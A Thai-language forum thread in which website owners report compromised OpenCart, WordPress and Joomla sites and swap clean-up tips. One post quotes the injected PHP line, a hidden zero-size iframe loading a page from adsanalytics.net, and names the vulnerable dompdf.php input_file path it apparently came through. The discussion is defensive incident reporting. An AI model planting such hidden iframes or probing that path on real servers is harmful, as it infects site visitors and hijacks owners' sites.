ต่อไป »

[ohmohm]

เข้าไปดูของตัวเอง พอจะคลิ๊กสินค้า เจอ dialog เตือนจาก stein.cz.cc ทำนองว่า browser เก่าไป

พอไปดู conf.php ของตัวเอง ด้วย ftp พบว่า modified date เป็นเมื่อวาน ซึ่งไม่น่าเป็นไปได้ get มาดู ก็เจอ

โค๊ด:

$INJ = '<iframe width=0 height=0 style='display:none' src="http://adsanalytics.net/in.cgi?2"></iframe>';

พอเอา คำว่า adsanalytics.net ไปค้น เจอเลยครับ
http://forum.opencart.com/viewtopic.php?f=20&t=13276

มันโจมตี ผ่าน system/helper/dompdf/dompdf.php
มันพึ่งโจมตี วันที่ 11 ก็คือเมื่อไม่กี่วันนี้เองครับ เลยมีออก v1.4.7 มาแก้ทันทีกันเลยครับ

[PornClip]

งานเข้าแล้ว OpenCart      

[ohmohm]

ของผมมัน version เก่าด้วยอะครับ แต่มันพึ่งคุกคามมาไม่กี่วัน แล้วตัวแก้ก็มาเกือบจะทันที
v1.4.7 วันที่ 11 เมษายน http://forum.opencart.com/viewtopic.php?f=2&t=13216
v1.4.6 update วันที่ 3 เมษายน http://forum.opencart.com/viewtopic.php?f=2&t=12925

[andiklin]

ขอบคุณที่มาเตือนครับ เดี๋ยวต้องไปดูของตัวเองแล้วครับ

[Halogen]

เลิกใช้ไปแล้วครับ 

[vii]

โดนเต็มๆซะแล้วสำหรับ e-commerce ไอ้ตัวเล็กตัวนี้.. ก็อัปเดทแก้กันไป
ตอนนี้พวกสคริป shopping cart ฟรีมีหลายตัวแต่ที่เวิร์คจริงมันน้อยเหลือเกิน
magento ก็ดีแต่ใหญ่และอืดมาก ต้องเล่นระดับ vps
prestashop ตัวใหม่แค่ติดตั้งแล้วลองสั่งซื้อ เอ่อ.. order creation failed เอาตรงขั้นตอนสุดท้าย
opencart ก็น่าจะดี...
oscommerce ...เก่ามาก..

[moneylicker]

ของผมเป็น wp ก็โดนอ่ะ แก้ไงอะครับ

[ohmohm]

มันคง inject มาทาง /artshop/upload/system/helper/dompdf/dompdf.php?input_file= ( http://forum.opencart.com/viewtopic.php?f=20&t=13212 ) ละครับ ลบไฟล์นี้ออก ก็น่าจะปลอดภัย

ของผมเป็น wp ก็โดนอ่ะ แก้ไงอะครับ

ใช้ wp version ไหนฮะ

[โกโลโกโส]

ผมใช้ wp  2.9.1 ก็โดนเหมือนกันครับแก้ยังไงตรงไหน ท่านใดรู้ช่วยบอกผมที - -"

[HotelBestBuy]

joomla บางเวบที่ทำเพิ่งโดนตัวนี้เข้าไปครับ
ยังไม่ทันได้ไล่ดูละเอียด แต่รู้สึกว่าอาจเกียวกับ url redirect ในเวบด้วย -_-'

[mama2008]

wp โดนเต็มๆเลยครับ หาวิธีแก้อยู่ เดวได้แล้วจะมาอัพเดทครับ

[mama2008]

คราวก่อนโดน iframe มันไปฝั่งไว้ใน เทมเพลตเปลี่ยนเทมเพลตก็หาย คราวนี้พอเปลี่ยน เทมเพลต เว็บหายเลยพี่น้อง ใครโดนระวังหน่อยนะครับ 

[โกโลโกโส]

wp โดนเต็มๆเลยครับ หาวิธีแก้อยู่ เดวได้แล้วจะมาอัพเดทครับ

แก้ได้แจ้งด้วยนะครับ ผมหาอยู่แต่ยังไม่เจอ (ทำไม่เป็นด้วยครับ อิอิ)

[xinexo]

ใครใช้รีบอัพด่วนนะครับ 

[mama2008]

wp ใครโดนบ้างครับ ยังหาทางแก้ไม่ได้เลย

[โกโลโกโส]

^
^
^
ผมแก้ได้แล้วครับ ลงใหม่เลย เอิ๊กๆ

โชคดีนะครับ

[mama2008]

^
^
^
ผมแก้ได้แล้วครับ ลงใหม่เลย เอิ๊กๆ

โชคดีนะครับ

ลงใหม่!!!!!!!!!!
และข้อมูลเก่าละครับ ลงใหม่นี่หมายถึงเอามาทับอันเดิมใช่ไหมครับ หรือว่าลบทำใหม่เลย

[โกโลโกโส]

ผมลบแล้วลงใหม่นะครับ ทำแบบบ้านๆเลย เอิ๊กๆ

ผมลบ wp ตัวเก่าออกหมด เก็บแค่ theme plugin ไฟล์ที่อัพโหลด ไฟล์wp-config ไว้ก่อน ส่วนDBผมไม่ได้ลบนะครับ
แล้วก็อัพ wp ตัวใหม่ขึ้นไป แล้วก็เอาไฟล์ที่แบ็คอัพไว้ทั้งหมดอัพขึ้นไปไว้ตำแหน่งเดิม

**ที่จริงผมว่าอัพทับมันก็น่าจะได้นะครับ

[mama2008]

ลองอัพไปทับแล้วไม่ได้สงสัยต้องลบบ้างแหละ และถ้ามันมาอีกเราต้องลบอีกหรอนี่ น่าจะมีวิธีดีกว่านี่นะ

[โกโลโกโส]

ลองอัพไปทับแล้วไม่ได้สงสัยต้องลบบ้างแหละ และถ้ามันมาอีกเราต้องลบอีกหรอนี่ น่าจะมีวิธีดีกว่านี่นะ

ถ้ารู้วิธีบอกผมด้วยนะครับ ^ ^